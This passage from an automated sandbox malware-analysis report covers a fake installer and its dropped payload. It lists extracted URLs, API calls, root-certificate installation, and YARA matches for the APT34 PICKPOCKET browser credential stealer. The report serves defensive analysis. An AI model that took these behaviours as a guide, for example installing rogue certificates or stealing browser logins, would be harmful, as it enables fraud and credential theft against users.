Source: ecvAA35.tmp.11.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecvAA35.tmp.11.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvAA35.tmp.11.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvAA35.tmp.11.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://sandbox.google.com/
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvAA35.tmp.11.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvAA35.tmp.11.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx8(
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304977853.0000000003D4F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_javal
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305037928.0000000003CB2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305037928.0000000003CB2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304977853.0000000003D4F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp, ecvAA35.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277888575.0000000003E12000.00000004.00000001.sdmp, ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/.?
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_0040AE4D OpenClipboard
Source: ThunderFW.exe, 0000001D.00000002.368499973.0000000000DCA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.6852B33702F6B3BD.exe.32a0000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 5.2.6852B33702F6B3BD.exe.34e0000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: FileSetup-v17.04.41.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6852B33702F6B3BD.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_0040C516 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004143EA: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0041B161 __EH_prolog,_memset,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00406012
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004581C0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00490370
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0049C3FC
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0049A3A9
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0044E3A0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004AA454
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004AE4BE
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004A855F
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0046251D
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004A05C3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0046E600
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00428690
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0044E710
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004A2789
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0043A820
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0043E8C0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00456880
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00406919
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00440A40
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004A8AA1
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0044EBB0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0043EE50
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00490F01
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004A8FE3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0044B000
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00441000
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00485090
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00457200
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0043F2D0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_10009257
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_10008340
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_10010590
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 29_2_00BFA0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 29_2_00BF963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 29_2_00BF6A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 29_2_00BFA7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 29_2_00BFB51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 29_2_00BF9B7F
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe A8FEFE8E1F92A30D1CDD4E2E2AFAACF08A02C8961F496EE16E89062417EC5F28
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 00425DE0 appears 88 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 00499C6C appears 37 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 00494DF0 appears 202 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 00426A70 appears 102 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 004B3A3D appears 38 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 004B39D3 appears 74 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 00427D50 appears 40 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 0048EDF0 appears 40 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: String function: 004C3A1C appears 136 times
Source: FileSetup-v17.04.41.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6852B33702F6B3BD.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611946678493.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611946678493.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FileSetup-v17.04.41.exe | Binary or memory string: OriginalFileName vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp | Binary or memory string: incompatible versionbuffer errorinsufficient memorydata errorstream errorfile errorstream endneed dictionaryinvalid length/\VarFileInfo\Translation\StringFileInfo\%04X%04X\CompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightOriginalFileNameProductNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuildH vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000000.221347616.0000000000512000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKInstallTool.exeV vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261245694.0000000002340000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261232452.0000000002330000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261225734.0000000002320000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe | Binary or memory string: incompatible versionbuffer errorinsufficient memorydata errorstream errorfile errorstream endneed dictionaryinvalid length/\VarFileInfo\Translation\StringFileInfo\%04X%04X\CompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightOriginalFileNameProductNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuildH vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe | Binary or memory string: OriginalFilenameKInstallTool.exeV vs FileSetup-v17.04.41.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: FileSetup-v17.04.41.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: 00000001.00000002.261933148.00000000028E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.385937201.00000000027D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.290296269.0000000002810000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6852B33702F6B3BD.exe.2810000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.27d0000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.10000000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.FileSetup-v17.04.41.exe.28e0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6852B33702F6B3BD.exe.2810000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.27d0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.FileSetup-v17.04.41.exe.10000000.6.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6852B33702F6B3BD.exe.10000000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.FileSetup-v17.04.41.exe.28e0000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects a suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.32a0000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 5.2.6852B33702F6B3BD.exe.34e0000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine | Classification label: mal90.bank.troj.spyw.evad.winEXE@32/37@4/3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004B84B2 GetLastError,_strncpy,FormatMessageA,__fprintf_l,_strrchr,_strrchr,GetLastError,SetLastError
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004140D4 __EH_prolog,CoInitializeEx,CoCreateInstance,CoSetProxyBlanket,VariantClear,CoUninitialize
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004023F0 __EH_prolog,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Login Data1611946677837
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | File created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
Source: FileSetup-v17.04.41.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
